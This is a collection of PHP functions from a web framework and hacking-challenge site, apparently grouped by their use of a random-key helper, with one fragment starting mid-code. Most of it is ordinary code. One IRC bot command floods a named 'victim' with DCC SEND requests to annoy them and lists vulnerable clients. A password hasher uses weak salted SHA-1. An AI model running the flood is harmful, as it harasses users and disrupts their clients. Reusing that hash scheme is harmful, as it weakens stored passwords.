/**
 * Admin action: create a new linked site from the submitted form.
 *
 * The row is inserted in status 'wanted' with two fresh 32-char auth keys,
 * then the site's vote rows, forum board, forum thread and a placeholder
 * description are created. Any database failure stops the chain and returns
 * an ERR_DATABASE message; earlier steps are not rolled back.
 *
 * @return string validation error followed by the re-rendered add form, an
 *                ERR_DATABASE message, or the 'msg_site_added' message
 */
public function onAddSite()
{
    $form = $this->getForm();
    $formError = $form->validate($this->module);
    if ($formError !== false) {
        // Show the validation error above the form again.
        return $formError . $this->templateSiteAdd();
    }

    // NOTE(review): site_authkey/site_xauthkey are shared secrets with the
    // remote site; their strength rests on GWF_Random::randomKey, whose
    // entropy source is not visible here — confirm it is CSPRNG-backed.
    $fields = array(
        'site_status' => 'wanted',
        'site_name' => $form->getVar('site_name'),
        'site_classname' => $form->getVar('site_classname'),
        'site_country' => 0,
        'site_language' => 0,
        'site_joindate' => GWF_Time::getDate(GWF_Date::LEN_SECOND),
        'site_launchdate' => '',
        'site_authkey' => GWF_Random::randomKey(32),
        'site_xauthkey' => GWF_Random::randomKey(32),
        'site_irc' => '',
        'site_url' => '',
        'site_url_mail' => '',
        'site_url_score' => '',
        'site_url_profile' => '',
        'site_score' => 0,
        'site_basescore' => 0,
        'site_avg' => 0,
        'site_vote_dif' => 0,
        'site_vote_fun' => 0,
        'site_challcount' => 0,
        'site_usercount' => 0,
        'site_visit_in' => 0,
        'site_visit_out' => 0,
        'site_options' => 0,
        'site_boardid' => 0,
        'site_threadid' => 0,
        'site_tags' => '',
    );
    $newSite = new WC_Site($fields);
    if (false === $newSite->insert()) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    // Dependent rows, each guarded separately so the failing step is reported.
    Module_WeChall::includeVotes();
    if (false === $newSite->onCreateVotes()) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    Module_WeChall::includeForums();
    if (false === $newSite->onCreateBoard()) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }
    if (false === $newSite->onCreateThread($this->module)) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    // Placeholder description (language id 1) for the admin to edit later.
    require_once GWF_CORE_PATH . 'module/WeChall/WC_SiteDescr.php';
    if (false === WC_SiteDescr::insertDescr($newSite->getID(), 1, 'Please edit me :)')) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    return $this->module->message('msg_site_added');
}
/**
 * Draw random tokens until one is not already stored.
 *
 * Collisions are detected through self::getByToken(), which yields false when
 * no row holds the candidate.
 *
 * @return string an unused token of self::TOKEN_LEN characters
 */
private static function generateToken()
{
    while (true) {
        $candidate = GWF_Random::randomKey(self::TOKEN_LEN);
        if (false === self::getByToken($candidate)) {
            return $candidate;
        }
    }
}
/**
 * Build a war token: six groups of five uppercase hex characters joined by
 * dashes (e.g. A1B2C-...-... — constructed example).
 *
 * @return string 35-character token
 */
private static function randomWarToken()
{
    $groups = array();
    for ($n = 0; $n < 6; $n++) {
        $groups[] = GWF_Random::randomKey(5, '0123456789ABCDEF');
    }
    return implode('-', $groups);
}
/**
 * Generate a token that no existing row already uses.
 *
 * The candidate is escaped before it is embedded in the WHERE clause; the
 * lookup is repeated until no row matches.
 *
 * @return string unused token of self::TOKEN_LENGTH characters
 */
public static function generateToken()
{
    do {
        $token = GWF_Random::randomKey(self::TOKEN_LENGTH);
        $probe = new self(false);
        $where = sprintf('token=\'%s\'', $probe->escape($token));
        $taken = false !== $probe->selectFirst('1', $where);
    } while ($taken);
    return $token;
}
/**
 * Store a fresh token for a user and hand it back.
 *
 * Writes (REPLACE) a row with userid, type, token and the current timestamp;
 * the optional payload is stored under 'data' only when it is a string.
 *
 * @param int $userid
 * @param string $type
 * @param string|false $data optional payload; ignored unless it is a string
 * @return string|false the new token, or false when the row could not be written
 */
public static function createToken($userid, $type, $data = false)
{
    $token = GWF_Random::randomKey(self::TOKEN_LENGTH);
    $row = array(
        'userid' => $userid,
        'type' => $type,
        'token' => $token,
        'timestamp' => time(),
    );
    if (is_string($data)) {
        $row['data'] = $data;
    }
    $entry = new self($row);
    if (false === $entry->replace()) {
        return false;
    }
    return $token;
}
/**
 * Create a local GWF_User row for a name registered on another site.
 *
 * The account receives a random throw-away password: it is hashed into the
 * row and discarded here, so nothing can log in with it by knowing the name.
 *
 * @param string $username
 * @return bool false when the insert failed
 */
private function onCrossRegister($username)
{
    $throwaway = GWF_Random::randomKey();
    $fields = array(
        'user_id' => 0,
        'user_options' => 0,
        'user_name' => $username,
        'user_password' => GWF_Password::hashPasswordS($throwaway),
        'user_regdate' => GWF_Time::getDate(GWF_Date::LEN_SECOND),
        'user_regip' => GWF_IP6::getIP(GWF_IP_EXACT),
        'user_email' => '',
        'user_gender' => 'no_gender',
        'user_lastlogin' => time(),
        'user_lastactivity' => time(),
        'user_birthdate' => '00000000',
        'user_avatar_v' => 0,
        'user_countryid' => 0,
        'user_langid' => 1,
        'user_langid2' => 0,
        'user_level' => 0,
        'user_title' => '',
        'user_settings' => '',
        'user_data' => '',
        'user_credits' => '0.00',
    );
    $user = new GWF_User($fields);
    return false !== $user->insert();
}
/**
 * Assign character $c a random two-letter code that is not yet used as a
 * value in $map.
 *
 * $map is updated in place and also returned. The loop only ends once an
 * unused pair is drawn; with 26*26 possible pairs that is practically
 * immediate for small maps.
 *
 * @param array $map character => two-letter code (modified in place)
 * @param string $c the character to map
 * @return array the updated map
 */
function crypto_dig1_map(array &$map, $c)
{
    do {
        $pair = GWF_Random::randomKey(2, 'abcdefghijklmnopqrstuvwxyz');
    } while (in_array($pair, $map));
    $map[$c] = $pair;
    return $map;
}
/**
 * Emit the next prog2 challenge string and start its timer.
 *
 * Requires a logged-in user; otherwise the login error text is output and
 * the script ends. The solution (9 to 12 random characters) and a
 * microsecond start timestamp are kept in the session, then the solution is
 * written as the response and the script ends.
 *
 * @param WC_Challenge $chall
 * @return void never returns normally (die())
 */
function prog2NextQuestion(WC_Challenge $chall)
{
    $user = GWF_Session::getUser();
    if ($user === false) {
        die($chall->lang('err_login'));
    }

    $length = rand(9, 12);
    $solution = GWF_Random::randomKey($length);
    GWF_Session::set('prog2_solution', $solution);
    GWF_Session::set('prog2_timeout', microtime(true));
    // No explicit session commit here (the original left one commented out).
    die($solution);
}
/**
 * Create a new token in the session and return its id.
 *
 * The session slot self::TOKEN_NAME holds an array of
 * tokenid => array(created_at, userdata). The slot is created on first use,
 * the new entry is written through a reference into the session, and
 * expired entries are purged via self::cleanupOldTokens().
 *
 * @param mixed $userdata payload stored next to the creation time
 * @return string the new token id (self::TOKEN_ENTROPY characters)
 */
public static function generateToken($userdata)
{
    if (!GWF_Session::exists(self::TOKEN_NAME)) {
        GWF_Session::set(self::TOKEN_NAME, array());
    }

    // Reference into the session array so the entry is stored in place.
    $tokens =& GWF_Session::get(self::TOKEN_NAME);

    // NOTE(review): unguessability depends on GWF_Random::randomKey's
    // entropy source, which is not visible here — confirm it is CSPRNG-backed.
    $tokenId = GWF_Random::randomKey(self::TOKEN_ENTROPY);
    $tokens[$tokenId] = array(time(), $userdata);

    self::cleanupOldTokens();
    return $tokenId;
}
/**
 * Serve the next crackcha image, or finish the round.
 *
 * When the round is over, a text/plain response reports either a database
 * error or the highscore message plus the reset output. Otherwise a fresh
 * 5-character uppercase code is stored in the session, the attempt counter
 * is increased and the captcha image is rendered with the teen.ttf font.
 *
 * @param WC_Challenge $chall
 * @return void output is written directly
 */
function crackcha_next(WC_Challenge $chall)
{
    if (crackcha_round_over()) {
        header('Content-Type: text/plain');
        if (false === crackcha_insert_high($chall)) {
            echo GWF_HTML::lang('ERR_DATABASE', array(__FILE__, __LINE__));
        } else {
            echo $chall->lang('msg_insert_high') . PHP_EOL;
            echo crackcha_reset($chall);
        }
        return;
    }

    require_once GWF_CORE_PATH . 'inc/3p/Class_Captcha.php';

    $code = GWF_Random::randomKey(5, GWF_Random::ALPHAUP);
    crackcha_increase_count();
    GWF_Session::set('WCC_CRACKCHA_CHARS', $code);

    $fonts = array(GWF_PATH . 'extra/font/teen.ttf');
    $captcha = new PhpCaptcha($fonts, 210, 42, GWF_CAPTCHA_COLOR_BG);
    $captcha->Create('', $code);
}
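/**
 * Upgrade step 1.01: add the wc_chall.chall_token column and fill it with an
 * 8-character random token for every challenge.
 *
 * The SELECT cursor is released on every exit path (the original leaked it
 * when an UPDATE failed), the id is cast to int and the token is escaped
 * before both are embedded in the UPDATE statement.
 *
 * @param Module_WeChall $module unused here
 * @return string '' on success, ERR_DATABASE HTML on failure
 */
function Upgrade_WeChall_1_01(Module_WeChall $module)
{
    var_dump('TRIGGERED Upgrade_WeChall_1_01 (chall_token)');
    $db = gdo_db();
    $challs = GWF_TABLE_PREFIX . 'wc_chall';

    $query = "ALTER TABLE {$challs} ADD COLUMN chall_token CHAR(8) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT ''";
    if (false === $db->queryWrite($query)) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    if (false === ($result = $db->queryRead("SELECT chall_id FROM {$challs}"))) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }

    while (false !== ($row = $db->fetchRow($result))) {
        $id = (int) $row[0];
        // randomKey's default alphabet is not visible here; escaping keeps the
        // statement well-formed whatever characters it produces.
        $token = $db->escape(GWF_Random::randomKey(8));
        $query = "UPDATE {$challs} SET chall_token='{$token}' WHERE chall_id={$id}";
        if (false === $db->queryWrite($query)) {
            $db->free($result);
            return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
        }
    }

    $db->free($result);
    return '';
}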
/*
 * Installer for the PHP/experience training challenge: registers the
 * challenge in WeChall and (re)seeds the challenge's own database.
 * $solution and $data are not defined in this file — presumably they come
 * from the including script or html_head.php; TODO confirm.
 */
require_once "challenge/html_head.php";
//html_head("Install Addslashes");
// Admin only: everything below truncates and rewrites challenge tables.
if (!GWF_User::isAdminS()) {
    echo GWF_HTML::err('ERR_NO_PERMISSION');
    return;
}
// $title = GWF_PAGE_TITLE;
$solution = $solution; // self-assignment; the value comes from the including scope
$score = 4;
$url = "challenge/training/php/experience/index.php";
$creators = "Gizmore";
$tags = 'MySQL,PHP,Exploit';
WC_Challenge::installChallenge(GWF_PAGE_TITLE, $solution, $score, $url, $creators, $tags);
// Separate database for the challenge itself (EXP_DB_* constants).
if (!($db = gdo_db_instance(EXP_DB_HOST, EXP_DB_USER, EXP_DB_PASS, EXP_DB_NAME))) {
    die(GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)));
}
$db->truncateTable('items');
$db->truncateTable('flags');
foreach ($data as $title) {
    $title = $db->escape($title); // escaped before being interpolated below
    $db->queryWrite("INSERT INTO items VALUES(0, '{$title}', NOW())");
}
// One flags row per known challenge, each holding a random 32-char decoy value.
$challenges = GDO::table('WC_Challenge')->selectObjects('*');
foreach ($challenges as $challenge) {
    $challenge instanceof WC_Challenge; // no-op statement; type hint for the IDE only
    $random_solution = GWF_Random::randomKey(32);
    $db->queryWrite("INSERT INTO flags VALUES({$challenge->getID()}, '{$random_solution}')");
}
// This challenge's own row carries the real solution. $solution is not
// escaped here, so it must not contain quotes or backslashes.
$challenge = WC_Challenge::getByTitle(GWF_PAGE_TITLE, false);
$db->queryWrite("REPLACE INTO flags VALUES({$challenge->getID()}, '{$solution}')");
require_once "challenge/html_foot.php";
/**
 * Generate a download token.
 *
 * @return string self::TOKEN_LENGTH characters drawn from the mixed-case
 *                alphanumeric alphabet
 */
public static function generateToken()
{
    $alphabet = GWF_Random::ALPHANUMUPLOW;
    return GWF_Random::randomKey(self::TOKEN_LENGTH, $alphabet);
}
/**
 * Hash a password with a fresh random salt.
 *
 * Layout: SHA1(SECRET_SALT . password . salt . SECRET_SALT) followed by the
 * salt in clear, so the salt can be read back from the stored value.
 *
 * NOTE(review): this is a single unsalted-iteration SHA-1 construction with a
 * static pepper, not a password KDF; switching to password_hash() would
 * require migrating stored values because verification depends on this
 * exact layout. The salt's quality also rests on GWF_Random::randomKey.
 *
 * @param string $password plaintext password
 * @return string hex SHA1 digest with the salt appended
 */
public static function hashPasswordS($password)
{
    $salt = GWF_Random::randomKey(self::SALTLEN);
    $material = self::SECRET_SALT . $password . $salt . self::SECRET_SALT;
    $digest = self::hashSHA1($material);
    return $digest . $salt;
}
/**
 * Create a new 32-character alphanumeric solution and remember it in the
 * session under 'LIV_SMI_SOL'.
 *
 * @return string the generated solution
 */
private static function genSolution()
{
    $alphabet = GWF_Random::ALPHANUMUPLOW;
    $solution = GWF_Random::randomKey(32, $alphabet);
    GWF_Session::set('LIV_SMI_SOL', $solution);
    return $solution;
}
/**
 * Reset the blight round for the current session.
 *
 * Optionally resets the consecutive-success counter, stores the round start
 * time in the session and writes a fresh 32-char uppercase-hex hash into the
 * blight table (REPLACE keyed by session).
 *
 * @param bool $consec also reset the consecutive counter (default true)
 * @return true|false result of the REPLACE query
 */
function blightReset($consec = true)
{
    if ($consec) {
        # Reset consecutive success counter.
        blightFailed();
    }

    # Take a timestamp.
    GWF_Session::set('BLIGHT3_TIME_START', time());

    # Generate a new hash.
    $db = blightDB();
    # NOTE(review): the session key is embedded unquoted, so it must be numeric;
    # confirm what GWF_Session::getSessSID() returns.
    $sessid = GWF_Session::getSessSID();
    # Hex-only alphabet, so the value is safe to embed in the statement.
    $hash = GWF_Random::randomKey(32, 'ABCDEF0123456789');
    return $db->queryWrite("REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)");
}
/**
 * Reset the blight round for the current session by writing a fresh
 * 32-char uppercase-hex hash (REPLACE keyed by the numeric session id).
 *
 * @return true|false result of the REPLACE query
 */
function blightReset()
{
    $db = blightDB();
    $sessid = GWF_Session::getSession()->getID();
    # Hex-only alphabet, so the value is safe to embed in the statement.
    $hash = GWF_Random::randomKey(32, 'ABCDEF0123456789');
    return $db->queryWrite("REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)");
}
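/**
 * Copy an .example skeleton to its destination, filling in the placeholders.
 *
 * Skeletons live in GWF_CORE_PATH/inc/install/data. An existing destination
 * file is left untouched. Placeholder values are emitted as PHP string
 * literals via var_export(): escapeshellarg() does not escape backslashes,
 * turns a quote into '\'' (a PHP parse error inside the generated file) and
 * on Windows replaces % and ! — a database password containing any of those
 * produced a broken or wrong config file.
 *
 * @param string $file   filename without extension
 * @param string $path   destination directory (with trailing slash)
 * @param string $ext    file extension, e.g. '.php'
 * @param string $output wizard HTML is appended to this by reference
 * @return bool false when the file could not be created
 */
public static function CopyExampleFile($file, $path, $ext = '.php', &$output)
{
    $copied = $path . $file . $ext;

    if (false !== Common::isFile($copied)) {
        $output .= GWF_InstallWizard::wizard_message('msg_copy_untouched', array($copied));
        return true;
    }

    if (false === GWF_File::isWriteable($copied)) {
        $output .= GWF_InstallWizard::wizard_error('err_copy', array($copied));
        return false;
    }

    # Load skeleton.
    $example = GWF_CORE_PATH . 'inc/install/data/' . $file . '.example' . $ext;
    if (false === ($content = file_get_contents($example))) {
        $output .= GWF_HTML::err('ERR_FILE_NOT_FOUND', array($example));
        return false;
    }

    # Replacements: quoted as PHP string literals (see class comment).
    # %%GWFPATH%% is kept verbatim, as before, since the skeleton quotes it itself.
    $replace = array(
        '%%GWFPATH%%' => GWF_DETECT_PATH,
        '%%DB%%' => var_export((string) GWF_DB_DATABASE, true),
        '%%USER%%' => var_export((string) GWF_DB_USER, true),
        '%%PASS%%' => var_export((string) GWF_DB_PASSWORD, true),
        '%%SALT%%' => var_export((string) GWF_Random::randomKey(16), true),
    );
    $content = str_replace(array_keys($replace), array_values($replace), $content);

    # Write custom file.
    if (false === file_put_contents($copied, $content)) {
        $output .= GWF_HTML::err('ERR_WRITE_FILE', array($copied));
        return false;
    }
    if (false === chmod($copied, GWF_CHMOD)) {
        # Report the file that could not be chmod'ed, not the skeleton.
        $output .= GWF_InstallWizard::wizard_error('err_copy', array($copied));
        return false;
    }

    $output .= GWF_InstallWizard::wizard_message('msg_copy', array($copied));
    return true;
}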
/** * Default config vars for the install wizard. Each entry is array($type, $section, $varname, $varvalue, $comment); types are 'int10', 'int8', 'text', 'bool', 'script'. The result is keyed by varname (index self::VARNAME). $lang is not used in this body. Under a web request the GWF_DOMAIN default is taken from the client-supplied Host header and GWF_ADMIN_EMAIL from SERVER_ADMIN — they are only pre-filled values the admin confirms. NOTE(review): GWF_SECRET_SALT is generated with GWF_Random::randomKey, whose entropy source is not visible here; confirm it is CSPRNG-backed. * @param GWF_LangTrans $lang unused * @return array varname => array($type, $section, $varname, $varvalue, $comment) */ private static function getDefaults(GWF_LangTrans $lang) { /* Domain and web root: fixed values under CLI, otherwise derived from the request (web root = everything up to and including the slash before 'install/'). */ if (PHP_SAPI === 'cli') { $domain = 'localhost'; $self = '/'; } else { $domain = $_SERVER['HTTP_HOST']; $self = substr($_SERVER['REQUEST_URI'], 0, strrpos($_SERVER['REQUEST_URI'], '/install/') + 1); } $path = GWF_PATH; /* The defaults table; the two comment strings containing line breaks are deliberate. */ $temp = array(array('text', 'Main', 'GWF_DOMAIN', $domain, 'Example: \'www.foobar.com\'.'), array('text', 'Main', 'GWF_SITENAME', 'Gizmore Website Framework', 'Your Site`s name. htmlspecialchars() it yourself.'), array('text', 'Main', 'GWF_WEB_ROOT_NO_LANG', $self, 'Add trailing and leading slash. Example: \'/\' or \'/mywebdir/\'.'), array('text', 'Main', 'GWF_DEFAULT_DOCTYPE', 'html5', 'Set the default html-doctype for gwf. Modules can change it.'), array('int10', 'Main', 'GWF_LOG_BITS', 0xfff, 'bitmask for logging: NONE = 0; GWF_WARNING = 0x01; GWF_MESSAGE = 0x02; GWF_ERROR = 0x04; GWF_CRITICAL = 0x08; PHP_ERROR = 0x10; DB_ERROR = 0x20; SMARTY = 0x40; HTTP_ERROR = 0x80; HTTP_GET = 0x100; HTTP_POST = 0x200; IP = 0x400;'), array('text', '3rd Party', 'GWF_SMARTY_PATH', GWF_SMARTY_PATH, 'Path to Smarty.class.php. Smarty replaced the GWF template engine and has to be available.'), array('text', '3rd Party', 'GWF_JPGRAPH_PATH', '/opt/php/jphraph/jpgraph.php', 'Path to jpgraph.php. JPGraph is a library to draw graphs with php. It is available under the GPL.'), array('text', '3rd Party', 'GWF_GESHI_PATH', '/opt/php/geshi/geshi.php', 'Path to geshi.php. GeSHi is a GPL licensed Syntax highlighter.'), array('text', 'Smarty', 'GWF_SMARTY_DIRS', $path . 'extra/temp/smarty/', 'Path to smarty directories for cache, config and compiling. With trailing slash.'), array('bool', 'Smarty', 'GWF_ERRORS_TO_SMARTY', true, 'Errors and Messsages are added to a smarty templatevar. 
If not set it is added before Pagecontent.'), array('text', 'Defaults', 'GWF_DEFAULT_LANG', 'en', 'Fallback language. Should be \'en\'.'), array('text', 'Defaults', 'GWF_DEFAULT_MODULE', 'GWF', '1st visit module. Example: \'MyModule\'.'), array('text', 'Defaults', 'GWF_DEFAULT_METHOD', 'About', '1st visit method. Example: \'Home\'.'), array('text', 'Defaults', 'GWF_DEFAULT_DESIGN', 'default', 'Default design. Example: \'default\'.'), array('text', 'Defaults', 'GWF_ICON_SET', 'default', 'Default Icon-Set. Example: \'default\'.'), array('text', 'Defaults', 'GWF_DOWN_REASON', 'Converting the database atm. should be back within 45 minutes.', 'The Message if maintainance-mode is enabled.'), array('text', 'Language', 'GWF_LANG_ADMIN', 'en', 'Admins language. Should be \'en\'.'), array('text', 'Language', 'GWF_SUPPORTED_LANGS', 'en;de;fr;it;pl;hu;es;bs;et;fi;ur;tr;sq;nl;ru;cs;sr;lv', 'Separate 2 char ISO codes by semicolon. Currently (partially) Supported: en;de;fr;it;pl;hu;es;bs;et;fi;ur;tr;sq;nl;ru;cs;sr'), array('int10', 'Various', 'GWF_ONLINE_TIMEOUT', 60, 'A request will mark you online for N seconds.'), array('int10', 'Various', 'GWF_CRONJOB_BY_WEB', 0, 'Chance in permille to trigger cronjob by www clients (0-1000)'), array('bool', 'Various', 'GWF_USER_STACKTRACE', true, 'Show stacktrace to the user on error? Example: true.'), /* Fresh 16-char secret per install; the comment says it must never change afterwards. */ array('text', 'Database', 'GWF_SECRET_SALT', GWF_Random::randomKey(16, GWF_Random::ALPHANUMUPLOW), 'May not be changed after install!'), array('int8', 'Database', 'GWF_CHMOD', 0700, 'CHMOD mask for file creation. 0700 for mpm-itk env. 0777 in worst case.'), array('text', 'Database', 'GWF_DB_HOST', 'localhost', 'Database host. Usually localhost.'), array('text', 'Database', 'GWF_DB_USER', '', 'Database username. 
Example: \'some_sql_username\'.'), array('text', 'Database', 'GWF_DB_PASSWORD', '', 'Database password.'), array('text', 'Database', 'GWF_DB_DATABASE', '', 'Database db-name.'), array('text', 'Database', 'GWF_DB_TYPE', 'mysql', 'Database type. Currently only \'mysql\' is supported.'), array('text', 'Database', 'GWF_DB_ENGINE', 'myIsam', 'Default database table type. Either \'innoDB\' or \'myIsam\'.'), array('text', 'Database', 'GWF_TABLE_PREFIX', 'gwf_', 'Database table prefix. Example: \'gwf3_\'.'), array('text', 'Session', 'GWF_SESS_NAME', 'GWF', 'Cookie Prefix. Example: \'GWF\'.'), array('int10', 'Session', 'GWF_SESS_LIFETIME', 60 * 240, 'Session lifetime in seconds.'), array('int10', 'Session', 'GWF_SESS_PER_USER', '1', 'Number of allowed simultanous sessions per user. Example: 1'), array('text', 'IP', 'GWF_IP_QUICK', 'hash_32_1', 'Hashed IP Duplicates. See core/inc/util/GWF_IP6.php'), array('text', 'IP', 'GWF_IP_EXACT', 'bin_32_128', 'Complete IP storage. See core/inc/util/GWF_IP6.php'), array('int10', 'EMail', 'GWF_DEBUG_EMAIL', 15, 'Send Mail on errors? 0=NONE, 1=DB ERRORS, 2=PHP_ERRORS, 4=404, 8=403, 16=MailToScreen)'), array('text', 'EMail', 'GWF_BOT_EMAIL', 'robot@' . $domain, 'Robot sender email. Example: robot@www.site.com.'), array('text', 'EMail', 'GWF_ADMIN_EMAIL', isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : 'admin@' . $domain, 'Hardcoded admin mail. Example: admin@www.site.com.'), array('text', 'EMail', 'GWF_SUPPORT_EMAIL', 'support@' . $domain, 'Support email. Example: support@www.site.com.'), array('text', 'EMail', 'GWF_STAFF_EMAILS', '', 'CC staff emails seperated by comma. Example: \'staff@foo.bar,staff2@blub.org\'.')); /* Re-key the list by variable name so callers can look entries up directly. */ $back = array(); foreach ($temp as $t) { $back[$t[self::VARNAME]] = $t; } return $back; }
/**
 * Create and persist a new session row, then send the session cookies.
 *
 * The row starts with no user, no data and no IP; the ETag variant of the
 * session handshake is disabled, so $create_etag has no effect here.
 *
 * @param bool $create_etag unused in the current implementation
 * @return bool false when the row could not be inserted
 */
private static function createSession($create_etag = false)
{
    // NOTE(review): session-id unpredictability rests entirely on
    // GWF_Random::randomKey; confirm it is CSPRNG-backed.
    $sid = GWF_Random::randomKey(self::SESS_ENTROPY);
    $fields = array(
        'sess_id' => 0,
        'sess_sid' => $sid,
        'sess_user' => NULL,
        'sess_data' => NULL,
        'sess_time' => time(),
        'sess_ip' => NULL,
        'sess_lasturl' => NULL,
    );
    $session = new self($fields);
    if (false === $session->insert()) {
        return false;
    }
    self::$SESSION = $session;
    self::setCookies($session->getVar('sess_id'), 0, $sid);
    return true;
}
/**
 * Log a rejected MC request and return a decoy value.
 *
 * The decoy is a random lowercase-hex string of self::SHA512_LEN characters
 * so the response is indistinguishable in shape from a real digest.
 *
 * NOTE(review): the GET parameters are written to baim_log.txt verbatim; a
 * value containing line breaks can forge additional log lines — consider
 * stripping control characters before logging.
 *
 * @param string $real_token expected token, for the log line
 * @param string $real_mc expected mc value, for the log line
 * @param string $ext_msg reason text
 * @return string random hex decoy
 */
private function garbage($real_token = '???', $real_mc = '???', $ext_msg = 'somethings wrong')
{
    $uid = Common::getGet('id') - 1000;
    $line = sprintf(
        'InvalidMC: uid=%d, token=%s(%s), mc=%s(%s): %s.',
        $uid,
        Common::getGet('token'),
        $real_token,
        Common::getGet('mc'),
        $real_mc,
        $ext_msg
    );
    GWF_Log::log('baim_log.txt', $line);
    return GWF_Random::randomKey(self::SHA512_LEN, GWF_Random::HEXLOWER);
}
/**
 * Insert a new MC row for a user with a fresh alphanumeric token.
 *
 * @param int $userid
 * @param bool $demo true marks the row with self::DEMO
 * @return self|false the inserted row, or false on database failure
 */
private static function createMCRow($userid, $demo)
{
    $flags = ($demo === true) ? self::DEMO : 0;
    $fields = array(
        'bmc_uid' => $userid,
        'bmc_date' => NULL,
        'bmc_token' => GWF_Random::randomKey(self::TOKEN_LEN, GWF_Random::ALPHANUMUPLOW),
        'bmc_mc' => NULL,
        'bmc_expires' => NULL,
        'bmc_options' => $flags,
    );
    $row = new self($fields);
    return false === $row->insert() ? false : $row;
}
<?php
/*
 * Dog IRC bot command. As its own help text states, it sends a burst of
 * DCC SEND CTCP requests at one user; 'good'/'bad' record which clients the
 * author found unaffected or affected. Arguments: <victim> [<amt=10>].
 */
$lang = array('en' => array('help' => 'Usage: %CMD% <victim> [<amt=10>]. Try to send masses of DCC SEND file requests to annoy a particular user.', 'good' => 'Protected Clients: nettalk', 'bad' => 'Flawed Clients: kvirc'));
$plugin = Dog::getPlugin();
$argv = $plugin->argv();
$argc = count($argv);
if ($argc === 1) {
    $amt = 10;
} elseif ($argc === 2) {
    // A non-positive or non-numeric amount shows the help text instead.
    if (0 >= ($amt = (int) $argv[1])) {
        return $plugin->showHelp();
    }
} else {
    return $plugin->showHelp();
}
$user = Dog::getUserByArg($argv[0]);
$server = Dog::getServer();
$one = chr(1); // CTCP delimiter byte
$ip = ip2long('92.77.135.158'); // fixed address literal from the original; not derived from the server
for ($i = 0; $i < $amt; $i++) {
    // Random file name, port and size per request (rand() is fine here: nothing secret).
    $filename = GWF_Random::randomKey(16) . '.txt';
    $port = rand(10000, 50000);
    $filesize = rand(20000, 80000);
    $payload = "PRIVMSG {$user->getName()} :{$one}DCC SEND {$filename} {$ip} {$port} {$filesize}{$one}";
    // $payload = "PRIVMSG {$user->getName()} :{$one}DCC CHAT $ip $port{$one}";
    $server->sendRAW($payload);
}
/**
 * Create a new forum options row for a user.
 *
 * The row carries a fresh random token (GWF_Random::TOKEN_LEN chars), no
 * subscription, an empty signature and zeroed counters; it is written with
 * REPLACE.
 *
 * @param int $userid
 * @return GWF_ForumOptions|false the row, or false when the write failed
 */
private static function createOptions($userid)
{
    $fields = array(
        'fopt_uid' => $userid,
        'fopt_token' => GWF_Random::randomKey(GWF_Random::TOKEN_LEN),
        'fopt_subscr' => self::SUBSCRIBE_NONE,
        'fopt_signature' => '',
        'fopt_options' => 0,
        'fopt_thanks' => 0,
        'fopt_upvotes' => 0,
        'fopt_downvotes' => 0,
        'fopt_posts' => 0,
    );
    $options = new self($fields);
    return false === $options->replace() ? false : $options;
}
/**
 * Nickname to hand to the Mibbit client: the logged-in user's name, or the
 * site name plus an 8-digit random suffix for guests.
 *
 * @return string
 */
private static function getMibbitNickname()
{
    $user = GWF_Session::getUser();
    if ($user !== false) {
        return $user->getVar('user_name');
    }
    $suffix = GWF_Random::randomKey(8, '0123456789');
    return GWF_SITENAME . '_' . $suffix;
}
/**
 * Create (or overwrite) a newsletter subscription for an address.
 *
 * nl_unsign is a 16-char random secret that the unsubscribe link presumably
 * has to present — verify against the unsubscribe handler. nl_mailed_ids
 * starts as the empty ':'-delimited list.
 *
 * @param string $email
 * @param int $type subscription options
 * @param int $langid
 * @return string ERR_DATABASE message, or the 'msg_signed' message
 */
private function onNewSign($email, $type, $langid)
{
    $fields = array(
        'nl_email' => $email,
        'nl_userid' => GWF_Session::getUserID(),
        'nl_options' => $type,
        'nl_unsign' => GWF_Random::randomKey(16),
        'nl_langid' => $langid,
        'nl_mailed_ids' => ':',
    );
    $subscription = new GWF_Newsletter($fields);
    if (false === $subscription->replace()) {
        return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__));
    }
    return $this->module->message('msg_signed');
}
$prot = $server->isSSL() ? 'ircs' : 'irc'; $port = $server->getPort(); } else { $url = parse_url($argv[0]); if (!isset($url['host'])) { return $plugin->rply('err_url'); } $host = $url['host']; $prot = isset($url['scheme']) ? strtolower($url['scheme']) : 'irc'; if ($prot !== 'irc' && $prot !== 'ircs') { return $plugin->rply('err_url'); } $default_port = $prot === 'ircs' ? 6697 : 6667; $port = isset($url['port']) ? intval($url['port']) : $default_port; $options = Dog_Server::DEFAULT_OPTIONS; $options |= $prot === 'ircs' ? Dog_Server::SSL : 0; } if (false !== ($server = Dog::getServerByArg($argv[0])) || false !== ($server = Dog::getServerByArg($host))) { $plugin->reply('reconnecting'); $server->saveOption(Dog_Server::ACTIVE, true); $server->saveOption(Dog_Server::SSL, $prot === 'ircs'); $server->saveVar('serv_port', $port); } else { $plugin->reply('adding_server'); $server = Dog_Server::getOrCreate($host, $port, $options); $server->setVar('dog_connector', Dog::getUser()); $server->setConf('ircoppass', GWF_Random::randomKey(8)); Dog::addServer($server); } $server->setConnectIn(0.5); $plugin->rply('connect');
/**
 * Generate a random token of self::TOKEN_LEN characters.
 *
 * NOTE(review): no uniqueness check is done here, and the token's strength
 * rests on GWF_Random::randomKey's entropy source — confirm it is CSPRNG-backed.
 *
 * @return string
 */
public static function generateToken()
{
    $token = GWF_Random::randomKey(self::TOKEN_LEN);
    return $token;
}